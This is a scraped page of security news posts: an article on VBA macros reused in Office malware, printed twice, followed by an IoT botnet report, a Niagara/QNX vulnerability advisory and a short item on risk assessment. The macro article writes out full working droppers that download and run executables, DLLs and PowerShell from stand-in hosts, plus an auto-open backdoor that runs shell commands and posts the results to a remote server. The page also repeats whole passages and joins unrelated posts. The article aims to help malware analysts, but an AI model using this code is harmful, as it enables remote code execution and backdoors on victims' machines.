Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

Nowadays one of the most frequent cybersecurity threat comes from Malicious (office) document shipped over eMail or Instant Messaging. Some analyzed threats examples include: Step By Step Office Dropper DissectionSpreading CVS Malware over GoogleMicrosoft Powerpoint as Malware DropperMalHIDEInfo Stealing: a New Operation in the WildAdvanced All in Memory CryptoWorm, etc. Many analyses over the past few years taught that attackers love re-used code and they prefer to modify, obfuscate and finally encrypt already known code rather than writing from scratch new “attacking modules”. Here comes the idea to collect a small set of VBA Macros widely re-used to “weaponize” Maldoc (Malware Document) in contemporary cyber attacks.

Very frequently Office documents such as Microsoft Excel or Microsoft Doc are used as droppers. The core concept of a dropper is to Download and to Execute a third party payload (or a second stage) and often when you analyse Office dropper you would experience many layers of obfuscation. Obfuscation comes to make the analysis harder and harder, but once you overcome that stage you would probably see a VBA code looking like the following one.

Download And Execute an External Program

Private Sub DownloadAndExecute()
    Dim droppingURL As String
    Dim localPath As String
    Dim WinHttpReq As Object, oStream As Object
    Dim result As Integer
    
    droppingURL = "https://example.com/mal.exe"
    localPath = "c://asd.exe"
    
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP")
    WinHttpReq.setOption(2) = 13056 ' Ignore cert errors
    WinHttpReq.Open "GET", droppingURL, False ', "username", "password"
    WinHttpReq.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    WinHttpReq.Send
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.ResponseBody
        oStream.SaveToFile localPath, 2  ' 1 = no overwrite, 2 = overwrite (will not work with file attrs)
        oStream.Close
        CreateObject("WScript.Shell").Run localPath, 0
    End If    
    
End Sub

The main idea behind this function (or sub-routine) is to invoke ServerXMLHTTP object to download a file from an external resource, to save it on local directory (ADODB.Stream object) and finally to execute it through the object WScript.Shell. You might find variants of this behavior, for example you might find controls over language to target specific countries or specific control on already infected machine, for example by avoiding network traffic if the file is already in the localPath. A possible very common way to add infection control on the same victim is, for example, by adding the following code before the HTTP request.

If Dir(localPath, vbHidden + vbSystem) = "" Then

Another very common way to weaponize Office files is to download and to execute a DLL instead of external file. In such a case we can invoke the exported DLL function directly from the VBA code as follows.

Drop And Execute External DLL

Private Sub DropAndRunDll()
    Dim dll_Loc As String
    dll_Loc = Environ("AppData") & "\Microsoft\Office"
    If Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    VBA.ChDir dll_Loc
    VBA.ChDrive "C"
    
    'Download DLL
    Dim dll_URL As String
    dll_URL = "https://example.com/mal.dll"

    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "Saved.asd", 2
        oStream.Close

        ModuleExportedInDLL.Invoke 
    End If
End Sub

Running DLL and External PE is not the only solution to run code on the victim machine, indeed we might use Powershell as well ! A nice way to execute PowerShell without direct access to PowerShell.exe is by using its DLLs, thanks to PowerShdll project this is possible, for example, in the following way

Dropping and Executing PowerShell

Sub RunDLL()
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { Invoke-WebRequest -useb "YouWish" } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Local As String
    dll_Local = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Local, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Local
        oStream.Close
    End If
End Sub

Or if you have direct access to PowerShell.exe you might use a simple inline script as the following one. This is quite common in today’s Office droppers as well.

Simple PowerShell Drop and Execute External Program

powershell  (New-Object System.Net.WebClient).DownloadFile('http://malicious.host:5000/payload.exe','microsoft.exe');Start-Process 'microsoft.exe';exit;

By applying those techniques (http and execute commands) you might decide to run commands on the victim machine such having a backdoor. Actually I did see this code few times related to manual attacks back in 2017. The code below comes from the great work made by sevagas.


Dim serverUrl As String ' Auto generate at startup Sub Workbook_Open() Main End Sub Sub AutoOpen() Main End Sub Private Sub Main() Dim msg As String serverUrl = "<<<TEMPLATE>>>" msg = "<<<TEMPLATE>>>" On Error GoTo byebye msg = PlayCmd(msg) SendResponse msg On Error GoTo 0 byebye: End Sub 'Sen data using http post' 'Note: 'WinHttpRequestOption_SslErrorIgnoreFlags, // 4 ' See https://msdn.microsoft.com/en-us/library/windows/desktop/aa384108(v=vs.85).aspx' Private Function HttpPostData(URL As String, data As String) 'data must have form "var1=value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1") objHTTP.Option(4) = 13056 ' Ignore cert errors because self signed cert objHTTP.Open "POST", URL, False objHTTP.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" objHTTP.setRequestHeader "Content-type", "application/x-www-form-urlencoded" objHTTP.SetTimeouts 2000, 2000, 2000, 2000 objHTTP.send (data) HttpPostData = objHTTP.responseText End Function ' Returns target ID' Private Function GetId() As String Dim myInfo As String Dim myID As String myID = Environ("COMPUTERNAME") & " " & Environ("OS") GetId = myID End Function 'To send response for command' Private Function SendResponse(cmdOutput) Dim data As String Dim response As String data = "id=" & GetId & "&cmdOutput=" & cmdOutput SendResponse = HttpPostData(serverUrl, data) End Function ' Play and return output any command line Private Function PlayCmd(sCmd As String) As String 'Run a shell command, returning the output as a string' ' Using a hidden window, pipe the output of the command to the CLIP.EXE utility... ' Necessary because normal usage with oShell.Exec("cmd.exe /C " & sCmd) always pops a windows Dim instruction As String instruction = "cmd.exe /c " & sCmd & " | clip" CreateObject("WScript.Shell").Run instruction, 0, True ' Read the clipboard text using htmlfile object PlayCmd = CreateObject("htmlfile").ParentWindow.ClipboardData.GetData("text") End Function

You probably will never see those codes like described here, but likely you will find many similarities with the Macros you are/will analyse in your next MalDoc analyses. Just remember that on one hand the attackers love to re-use code but on the other hand they really like to customize it. In your next VBA Macro analysis keep in mind those stereotypes and speed up your analysis.

The original post is available on Marco Ramilli’s blog:

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cyber security experiences by diving into SCADA security issues with some of the most biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cyber security defence center I’ve ever experienced ! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – VBA macros, Office malware)

The post Frequent VBA Macros used in Office Malware appeared first on Security Affairs.

Gucci IOT Bot Discovered Targeting European Region

Security Labs discovered a new IOT bot named “GUCCI”. It seems like the IOT botnet is named after an Italian luxury brand of fashion and leather goods.

Analysis

The discovery came to exist during our reconnaissance and intelligence collection process.  The IOT threat detection engine picked the infection IP has shown below hosting number of bins for different architectures

Gucci

Figure 1: GUCCI Bot Binaries

All the bins were successfully downloaded and magic headers were analyzed to check the type of file. Figure 2 highlights how the GUCCI bot binaries are compiled.

Figure 2:  Bot: compiled Binaries

As you can see the output in Figure 2, all the Gucci bot binaries are “stripped”.  This means that when these binaries were compiled all the debug symbols were removed from these executables to reduce the size. Listing 1 highlights the Md5 hashes of the binaries being analyzed.

MD5 (arm) = b24e88da025e2e2519a96dd874e6ba8bMD5 (arm5) = 24ef4178e365c902cfdd53d0ea0d1dc2MD5 (arm6) = 5a5a27635570b2c3634cab62beadc951MD5 (arm7) = c1ef67719e9762fc46aeb28a064fe0aeMD5 (m68k) = 2b984677ab9ee264a2dae90ca994a2a6MD5 (mips) = a0e0da3ae1ad1b94f0626c3e0cb311adMD5 (mpsl) = ee26f791f724f92c02d976b0c774290dMD5 (ppc) = e16f594cbdd7b82d74f9abc65e0fe677MD5 (sh4) = a70d246e911fe52638595ea97ed07342MD5 (spc) = d1b719ab9b7be08ea418b47492108dfaMD5 (x86) = de94d4718127959a494fe8fbc4aa5b2a
Listing 1: MD5 Hashes of the Gucci Bit Binaries

The binaries were found to be obfuscated in nature. On further analysis, it was analyzed that the Gucci bot was connecting to the  remote IP on the  TCP port “5555” and transmitting the data accordingly.  Digging deeper, we found that the remote host running a custom telnet service on TCP port 5555 and exchanging commands with Gucci bots regularly. When a test connection was initiated on TCP port 5555  using telnet client on remote IP,  the successful connection acceptance resulted in requirement of credentials.

Compromising C&C

Without authentication credential, it was not possible to access the service.  Considering all scenarios, automated brute force and account cracking attempts were performed. The account credentials were successfully cracked and connection was initiated and accepted as credentials are accepted.

Figure 3 highlights that Gucci bot Command and Control panel was hijacked and privilege access was obtained.                                                                                                                     

Figure 3: Gucci C&C Bot Panel

The C&C listed out the different type of Denial of Service (DoS) attack types supported by the Gucci bot. The support scans are:

  • HTTP null scan
  • UDP flood
  • Syn flood
  • ACK flood
  • UDP flood with less protocol options
  • GRE IP flood
  • Value Source Engine specific flood

It was noticed that Gucci bot was in early stages of deployment.  It was also analyzed that  the botnet operator was monitoring all the access connections to the Gucci C&C.  As soon as the botnet operator realized that the C&C has been compromised, the TCP service was removed from the host and operator cleaned the directories and performed an additional set of operations to hide indicators and artefacts.  The binaries were distributed from the location as provided in Figure 4

Figure 4: Gucci Bot – Source of Distribution

Inference

A new IOT bot Gucci has been discovered and analyzed accordingly.  The botnet operator was found to be very proactive. The whole analysis and obtaining C&C  access was like an arms race.  The purpose of this research is to share the discovery details with the security research community so that extracted intelligence can be used to fingerprint, detect and prevent Gucci bot infections. It is anticipated the Gucci botnet is still in active phase and targeting European region. However, the attacks triggered by Gucci bot could be broad based or targeted depending on the requirements.

About the authors:

Aditya K Sood is a Cyber Security Expert and working in the field for more than 11 years now. His work can be found at: https://adityaksood.com;

Rohit Bansal is a Principal Security Researcher at SecNiche Security Labs

Pierluigi Paganini

(SecurityAffairs – malware, botnet)

The post Gucci IOT Bot Discovered Targeting European Region appeared first on Security Affairs.

Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS

Tridium’s Niagara product is affected by two vulnerabilities in BlackBerry’s QNX operating system for embedded devices.

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) is warning of two vulnerabilities in Tridium’s Niagara product that reside in the BlackBerry’s QNX operating system for embedded devices.

The flaws could be exploited by a local user to escalate their privileges.

The Niagara Framework is a universal software infrastructure developed by Tridium that allows building controls integrators, HVAC and mechanical contractors to build custom, web-enabled applications for accessing, automating and controlling smart devices real-time via local network or over the Internet.

Tridium Niagara product

The Niagara framework is widely adopted, especially in the commercial facilities, government facilities, critical manufacturing and IT sectors.

The security flaws impact Niagara AX 3.8u4, 4.4u3 and 4.7u1.

The most severe vulnerability, tracked as CVE-2019-8998, is an information disclosure flaw related to the procfs service that can be exploited by a local attacker for privilege escalation.

The flaw was discovered by Johannes Eger and Fabian Ullrich of the Secure Mobile Networking Lab at TU Darmstadt in Germany and received a CVSS score of 7.8.

“This advisory addresses an information disclosure vulnerability leading to a potential local escalation of privilege in the default configuration of the procfs service (the /proc filesystem) on affected versions of the BlackBerry QNX Software Development Platform (QNX SDP) that could potentially allow a successful attacker to gain unauthorized access to a chosen process address space.” reads the advisory.

BlackBerry QNX confirmed that it is not aware of attacks exploiting the flaw in the wild.

The second vulnerability, tracked as CVE-2019-13528, is an improper authorization issue, it could allow a specific utility to gain read access to privileged files.

“A specific utility may allow an attacker to gain read access to privileged files in the Niagara AX 3.8u4 (JACE 3e, JACE 6e, JACE 7, JACE-8000), Niagara 4.4u3 (JACE 3e, JACE 6e, JACE 7, JACE-8000), and Niagara 4.7u1 (JACE-8000, Edge 10).” reads the advisory.

This flaw was reported by Francisco Tacliad and it received a CVSS score of 4.4.

Tridium has released updates that address these vulnerabilities and recommends users update to the versions identified below:

  • Niagara AX 3.8u4: 
    • OS Dist: 2.7.402.2
    • NRE Config Dist: 3.8.401.1
  • Niagara 4.4u3:
    • OS Dist: 4.4.73.38.1 NRE Config
    • Dist: 4.4.94.14.1
  • Niagara 4.7u1:
    • OS Dist: (JACE 8000) 4.7.109.16.1
    • OS Dist (Edge 10): 4.7.109.18.1
    • NRE Config Dist: 4.7.110.32.1

Pierluigi Paganini

(SecurityAffairs – Tridium, IoT)

The post Tridium Niagara framework affected by 2 flaws in BlackBerry QNX OS appeared first on Security Affairs.

Assessing risk: Measuring the health of your infosec environment

There is an uncomfortable truth that many organizations are not conducting comprehensive assessments of their information security risk; or those that do aren’t getting much value out of assessment exercises — because they simply don’t know how. Given the massive amounts of data organizations hold, accurately assessing these risks is difficult. So is determining how to best control them once they are identified. That’s especially needed for businesses in highly regulated industries that can face … More

The post Assessing risk: Measuring the health of your infosec environment appeared first on Help Net Security.